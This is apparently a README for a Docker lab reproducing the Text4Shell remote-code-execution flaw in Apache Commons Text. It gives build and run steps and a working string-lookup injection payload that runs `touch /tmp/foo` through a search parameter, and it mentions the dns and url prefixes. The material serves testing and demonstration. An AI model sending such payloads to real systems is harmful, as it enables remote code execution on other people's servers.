Install maven - maven-linux
- Docker build
docker build --tag=text4shell .
- Docker run
docker run -p 80:8080 text4shell
- Test the app
http://localhost/text4shell/attack?search=<anything>
- Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup:
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
-
You can also try using
dns
orurl
prefixes. -
Get the container id
docker container ls
- Get into the app
docker exec -it <container_id> bash
- To check if above RCE was successful (You should see a file named
foo
created in the/tmp
directory):
ls /tmp/
- To stop the container
docker container stop <container_id>